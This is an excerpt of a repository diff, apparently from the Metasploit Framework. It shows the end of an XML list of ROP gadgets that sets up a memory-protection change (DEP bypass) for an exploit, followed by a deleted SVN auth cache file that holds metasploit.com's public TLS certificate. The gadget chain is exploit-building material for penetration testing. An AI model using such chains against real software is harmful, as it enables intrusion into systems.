<gadget offset="0x00042265">PUSH ESP # RETN</gadget> <gadget offset="0x00042265">ptr to 'push esp # ret'</gadget>
<gadget offset="0x000385b7">POP EBX # RETN</gadget> <gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x00000400">0x00000400-> ebx</gadget> <gadget value="0x03C0990F">EAX</gadget>
<gadget offset="0x0003e4fc">POP EDX # RETN</gadget> <gadget offset="0x0003d441">SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)</gadget>
<gadget value="0x00000040">0x00000040-> edx</gadget> <gadget offset="0x000148d3">POP EBX, RET</gadget>
<gadget offset="0x000330fb">POP ECX # RETN</gadget> <gadget offset="0x000521e0">.data</gadget>
<gadget offset="0x0004ff56">Writable location</gadget> <gadget offset="0x0001f102">XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN</gadget>
<gadget offset="0x00038a92">POP EDI # RETN</gadget> <gadget offset="0x0001fc02">POP ECX # RETN</gadget>
<gadget offset="0x00037d82">RETN (ROP NOP)</gadget> <gadget offset="0x0004f001">W pointer (lpOldProtect) (-> ecx)</gadget>
<gadget offset="0x0003eebf">POP EAX # RETN</gadget> <gadget offset="0x00038c04">POP EDI # RETN</gadget>
<gadget value="nop">nop</gadget> <gadget offset="0x00038c05">ROP NOP (-> edi)</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="0x03C0944F">EAX</gadget>
<gadget offset="0x0003d441">SUB EAX, 03c0940f</gadget>
<gadget offset="0x00018285">XCHG EAX,EDX # RETN</gadget>
<gadget offset="0x00012563">POP EAX # RETN</gadget>
<gadget value="nop">NOP</gadget>
<gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget> <gadget offset="0x00046591">PUSHAD # ADD AL,0EF # RETN</gadget>
</gadgets> </gadgets>
</rop> </rop>

13
data/svn/auth/svn.ssl.server/19bdfeb3753b288b06b4205235b24238
View File

@ -1,13 +0,0 @@
K 10
ascii_cert
V 1844
MIIFYzCCBEugAwIBAgIHBHTfnZklJzANBgkqhkiG9w0BAQUFADCByjELMAkGA1UEBhMCVVMxEDAOBgNVBAgTB0FyaXpvbmExEzARBgNVBAcTClNjb3R0c2RhbGUxGjAYBgNVBAoTEUdvRGFkZHkuY29tLCBJbmMuMTMwMQYDVQQLEypodHRwOi8vY2VydGlmaWNhdGVzLmdvZGFkZHkuY29tL3JlcG9zaXRvcnkxMDAuBgNVBAMTJ0dvIERhZGR5IFNlY3VyZSBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0eTERMA8GA1UEBRMIMDc5NjkyODcwHhcNMTAwMzE2MTIwOTU5WhcNMTMwNDAxMjIwMjI0WjBVMRcwFQYDVQQKEw5tZXRhc3Bsb2l0LmNvbTEhMB8GA1UECxMYRG9tYWluIENvbnRyb2wgVmFsaWRhdGVkMRcwFQYDVQQDEw5tZXRhc3Bsb2l0LmNvbTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAK+V3Vs8M+48CofjzH5KE3MA1CmfXhz2vweW3x27TKhZBxbLLxVOpnbFTxfc6gD1NmcRfBRyRuGNclkwnkfQZ4YbkXIJWCjov0OZNfYTNOQbDtdZPK9q94h9wHUQOkpXl1k+Xe8+gVqLilqcS1ikISUQVsKBYa18FaT/PyFEv00ZsewtehL6C9oXCm81HH2S/HBu+CW1TJ3X5Loivs24aR65dzsKFhG2tnzUxox0Rg2ixPUue8xAoTGquujmy/0aa6yeT1kswFTLncTL/GLxQggtah9ul50pYQWRLuTNOIYsjSS32zPs1ZOTN8RkDrdCmEWPUxrzgmUmNQzKDvHjVp8CAwEAAaOCAcAwggG8MA8GA1UdEwEB/wQFMAMBAQAwHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMA4GA1UdDwEB/wQEAwIFoDAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdvZGFkZHkuY29tL2dkczEtMTUuY3JsMFMGA1UdIARMMEowSAYLYIZIAYb9bQEHFwEwOTA3BggrBgEFBQcCARYraHR0cDovL2NlcnRpZmljYXRlcy5nb2RhZGR5LmNvbS9yZXBvc2l0b3J5LzCBgAYIKwYBBQUHAQEEdDByMCQGCCsGAQUFBzABhhhodHRwOi8vb2NzcC5nb2RhZGR5LmNvbS8wSgYIKwYBBQUHMAKGPmh0dHA6Ly9jZXJ0aWZpY2F0ZXMuZ29kYWRkeS5jb20vcmVwb3NpdG9yeS9nZF9pbnRlcm1lZGlhdGUuY3J0MB8GA1UdIwQYMBaAFP2sYTKTbEXW4u6FX5q653aZaMznMC0GA1UdEQQmMCSCDm1ldGFzcGxvaXQuY29tghJ3d3cubWV0YXNwbG9pdC5jb20wHQYDVR0OBBYEFDkiSjDeC0NDm2ioUVerYRuLWtbyMA0GCSqGSIb3DQEBBQUAA4IBAQAgATMjfkj0zvvpTWSxVLUjtMTsei+lC8v79mTqM/+3DWZZj8Tc6xUyhxNreAW137WKiJxQSEnrdMzVxozp99iL4RYH1tVTukXV4XVkRbFrtAw7dCYV6dYbp4Ru4dy97CUBceUDCXQpC3t6CNU66RIg6UAa6MV7DmJrEUhNSAB5LqsY3oyhFcV5jT0QYGMC0XuUylzNBW4AWCnlMDysJhSJ75RHa9e76S6g8m4TWT3b02LCdunzcl1kq4cmH6xPr5X3U8CkV6YGBTQhltuNQMM5OBxga1lfCFa81hSSa3300f8YBhwMatloUgu5gzQh/o3nFDJL6CDh6/fCqZyI32r+
K 8
failures
V 1
8
K 15
svn:realmstring
V 26
https://metasploit.com:443
END

Some files were not shown because too many files have changed in this diff Show More